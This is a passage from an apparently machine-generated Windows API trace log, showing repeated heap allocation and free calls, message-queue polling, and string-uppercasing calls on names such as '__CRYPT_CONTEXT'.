(HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca748 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0077.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0077.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0077.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.852] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.852] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0077.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0077.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0077.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.852] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0077.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0077.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0077.852] PeekMessageW (in: lpMsg=0x144e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e944) returned 0 [0077.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0077.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0077.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0077.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0077.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0077.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0077.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0077.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0077.853] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0077.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0077.853] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0077.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0077.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.853] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0077.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0077.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0077.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0077.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0077.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0077.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0077.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0077.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0077.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0077.853] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0077.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0077.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0077.855] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0077.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.855] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0077.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1a8 [0077.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.855] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0077.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0077.855] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0077.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0077.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0077.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0077.855] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0077.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0077.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0077.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0077.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2b0 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1d8 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca358 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0077.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0077.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0077.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0077.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0077.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.857] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.857] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0077.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0077.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0077.857] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0077.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0077.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0077.857] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0077.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0077.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0077.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0077.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0077.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0077.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0077.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0077.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0077.858] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0077.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0077.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0077.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0077.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0077.858] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0077.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0077.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0077.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0077.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0077.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0077.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0077.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.859] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1d8 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0077.859] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0077.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0077.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0077.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0077.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0077.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0077.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0077.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0077.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0077.860] 